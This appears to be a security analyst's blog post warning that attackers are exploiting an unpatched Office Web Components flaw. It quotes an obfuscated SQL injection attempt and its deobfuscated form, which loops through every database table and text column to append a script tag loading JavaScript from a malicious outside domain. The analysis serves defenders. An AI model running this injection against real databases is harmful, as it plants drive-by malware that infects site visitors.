As we thought, it was just a matter of time before more attackers start exploiting the still unpatched Office Web Components vulnerability.

While a day ago reports of exploits for this vulnerability were still a bit rare, yesterday Ken Hoover sent a log of an SQL injection attempt to his web site. The SQL injection attempt looks very much like the one we've been seeing for month – the attacker blindly tries to inject obfuscated SQL code:

';DECLARE @S NVARCHAR(4000);
SET @S=CAST(0x44004500430…F007200 AS NVARCHAR(4000));
EXEC(@S);

After deobfuscation of the CAST function input, the following SQL code is revealed:

DECLARE @T varchar(255),@C varchar(255) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM  Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar,['+@C+']))+''<script src=hxxp://f1y.in/j.js></script>''')FETCH NEXT FROM  Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor

As you can see, they are injecting a script code pointing to f1y.in, which is a known bad domain. This script contains links to two other web sites (www.jatrja.com and js.tongji.linezing.com) serving malicious JavaScript that, besides exploits for some older vulnerabilities, also include the exploit for the OWC vulnerability.

The exploits end up downloading a Trojan (of course, what else) which currently has pretty bad detection (VT link) – only 15 AV programs detecting it, luckily, some major AV vendors are there.

If you haven't set those killbits yet, be sure that you do know because the number of sites exploiting this vulnerability will probably rise exponentially soon.

--
Bojan